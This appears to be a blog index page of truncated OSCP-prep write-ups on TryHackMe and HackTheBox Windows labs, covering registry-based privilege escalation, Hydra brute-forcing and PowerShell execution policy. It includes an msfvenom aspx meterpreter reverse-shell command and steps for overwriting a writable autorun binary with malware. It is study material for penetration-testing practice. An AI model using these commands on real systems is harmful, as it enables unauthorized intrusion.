winPEAS 4

Windows PrivEsc - Registry, Password, AutoRun, StartUp, GUI, token

[Task 7] Registry - AutoRuns 자동실행으로 등록된 레지스트리 확인한다. reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 자동실행으로 등록된 프로그램이 Everyone 권한에게 Writable 권한을 부여했는지 체크한다. C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" 해당 프로그램을 악성파일로 덮어쓴다. 윈도우가 재시작되면 PWN된다. [Task 8] Registry - AlwaysInstallElevated 레지스트리 값 AlwaysInstallElevated이 1로 설정되면 취약 Query the registr..

OSCP/TryHackMe 2020.07.13

[Windows] Devel

Devel * 웹에서 venom 쉘이 실행되도록 was가 실행가능한 포멧으로 페이로드를 생성하여 업로드. Armed with the ability to upload files, it is possible to drop an aspx reverse shell on the target and execute it by browsing to the file via the web server. The following command will create the aspx file: msfvenom -p windows/meterpreter/reverse_tcp LHOST=호스트 LPORT=포트 -f aspx > devel.aspx 다음과 같이 curl을 사용하여 콘솔에서 트리거 할 수 있음 curl -g 10.10...

OSCP/HackTheBox 2020.05.19

[Windows] HackPark

HackPark Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine! 1. 익스플로잇-DB 설명 잘 해석하여 StepByStep 따라하기 2. 윈도우에 파워쉘이 설치되어 있으면 wget처럼 다운로드가 쉽다. 3. 권한상승을 위해 winPEAS 또는 파워업 쉘을 활용하자. 4. 페이로드 주입시 미터프리터, 커맨드 쉘 둘다 시도해 보자. 5. 히드라 브루트포스시 필수 파라미터 다 입력해줘야 한다. 더블쿼트 사용시 버그발생함, 싱글쿼트만 사용하자. Flow 정리 1. 정보수집 홈페이지 -> admin 브루트포스(히드라) -> CMS 정..

OSCP/TryHackMe 2020.04.20

파워 쉘 for 침투테스트-1

실행정책 체크 가장 먼저해야 될 일은 파워 쉘 스크립트 파일(.ps1)을 실행 가능한지 체크하는 것이다. cmd> powershell Get-ExecutionPolicy 보안상의 이유로 스크립트 실행에 대한 기본 정책은 Restricted입니다. 다른 스크립트 정책은 다음과 같습니다. Restricted: 파워쉘은 어떤 스크립트든 실행할 수 없다. (파워쉘의 디폴트 실행 정책) Bypass: 어떤 것도 차단되지 않으며 경고나 프롬프트가 없습니다. AllSigned: PowerShell: 디지털 서명으로 서명 된 스크립트 만 실행합니다. 게시자가 서명 한 스크립트를 실행하면 PowerShell은 이전에 보지 못했지만 PowerShell은 스크립트의 게시자를 신뢰할지 묻습니다. RemoteSigned: Po..

OSCP/시험대비 2020.04.16